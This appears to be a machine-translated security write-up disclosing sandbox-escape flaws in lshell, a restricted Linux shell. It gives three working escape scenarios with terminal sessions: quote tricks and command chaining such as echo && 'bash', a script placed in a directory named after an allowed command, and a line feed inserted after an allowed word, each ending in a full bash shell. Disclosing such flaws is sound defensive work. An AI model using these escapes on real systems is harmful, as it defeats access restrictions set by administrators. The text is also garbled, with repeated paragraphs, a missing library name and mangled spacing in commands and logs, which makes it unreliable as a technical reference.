0day vulnerabilities in lshell
lshell is a shell that restricts file system commands and paths that are accessible to the user. It is read as an alternative to the sophisticated chroot setup:
and so on, there are many sources offering it for use.
The application is available in the repositories of Ubuntu, Debian and EPEL.
A quick look at lshell notes on configuration files shows that some of the restrictions introduced by lshell are used to simplify parsing commands, and not to enhance security. For example - the prohibition of the use of semicolons and sub-shells. It makes sense to take a closer look at how this parsing is implemented.
When examining the source code, it becomes clear that the selection of the launched command and its arguments is made by the library , which is intended for parsing simple CLI commands and does not parse correctly the complex syntax of shell commands. At the same time, despite the warning in the documentation , after a simple validation, the command is passed to the / bin / sh shell . Validation deserves special attention and is based on the assumption that:
There is no real syntax analysis anywhere, so these are far from all the assumptions made in the verification.
The following scenarios are available for escaping from such a limited shell.
This software solution is too far from a state in which it can be used safely. Therefore, the best way would be to stop its operation.
and so on, there are many sources offering it for use.
The application is available in the repositories of Ubuntu, Debian and EPEL.
Code Issues
A quick look at lshell notes on configuration files shows that some of the restrictions introduced by lshell are used to simplify parsing commands, and not to enhance security. For example - the prohibition of the use of semicolons and sub-shells. It makes sense to take a closer look at how this parsing is implemented.
When examining the source code, it becomes clear that the selection of the launched command and its arguments is made by the library , which is intended for parsing simple CLI commands and does not parse correctly the complex syntax of shell commands. At the same time, despite the warning in the documentation , after a simple validation, the command is passed to the / bin / sh shell . Validation deserves special attention and is based on the assumption that:
- team is always single line
- nothing needs to be checked inside quotes
There is no real syntax analysis anywhere, so these are far from all the assumptions made in the verification.
The consequences
The following scenarios are available for escaping from such a limited shell.
Scenario 1: exploiting a problem with quotation marks and command chains
Gh issue
vladislav @ dt1: ~ $ getent passwd testuser testuser: x: 1002: 1003: ,,,: / home / testuser: / usr / bin / lshell vladislav @ dt1: ~ $ su - testuser Password: You are in a limited shell. Type '?' or 'help' to get the list of allowed commands testuser: ~ $? cd clear echo exit help history ll lpath ls lsudo testuser: ~ $ ls examples.desktop testuser: ~ $ which bash *** forbidden command: which testuser: ~ $ ls'usb ' Bus 002 Device 001: ID 1d6b: 0003 Linux Foundation 3.0 root hub Bus 001 Device 006: ID 046d: c05a Logitech, Inc. M90 / M100 Optical Mouse Bus 001 Device 002: ID 046d: c31c Logitech, Inc. Keyboard K120 Bus 001 Device 001: ID 1d6b: 0002 Linux Foundation 2.0 root hub testuser: ~ $ echo && 'bash' testuser @ dt1: ~ $ PATH = / usr / local / sbin: / usr / local / bin: / usr / sbin: / usr / bin: / sbin: / bin: / usr / games: / usr / local / games: / snap / bin testuser @ dt1: ~ $ reboot --help reboot [OPTIONS ...] [ARG] Reboot the system. --help Show this help --halt Halt the machine -p --poweroff Switch off the machine --reboot Reboot the machine -f --force Force immediate halt / power-off / reboot -w --wtmp-only Don't halt / power-off / reboot, just write wtmp record -d --no-wtmp Don't write wtmp record --no-wall Don't send wall message before halt / power-off / reboot
Gh issue
Scenario 2: running a script from your home directory, the path to which contains the name of the allowed command
Gh issue
vladislav @ dt1: ~ $ su - testuser Password: You are in a limited shell. Type '?' or 'help' to get the list of allowed commands testuser: ~ $? cd clear echo exit help history ll lpath ls lsudo testuser: ~ $ echo '/ 1.sh' testuser @ dt1: ~ $ cat echo / 1.sh #! / bin / bash / bin / bash testuser @ dt1: ~ $
Gh issue
Scenario 3: using custom terminal sequences
It is enough to start the command with any allowed word, insert a line feed by successive pressing of two keyboard shortcuts and enter any desired command on a new line.
Gh issue
vladislav @ dt1: ~ $ getent passwd testuser testuser: x: 1001: 1002: ,,,: / home / testuser: / usr / bin / lshell vladislav @ dt1: ~ $ su - testuser Password: You are in a limited shell. Type '?' or 'help' to get the list of allowed commands testuser: ~ $? cd clear echo exit help history ll lpath ls lsudo testuser: ~ $ bash *** forbidden command: bash testuser: ~ $ echobash testuser @ dt1: ~ $ which bash / bin / bash
Gh issue
The best decision
This software solution is too far from a state in which it can be used safely. Therefore, the best way would be to stop its operation.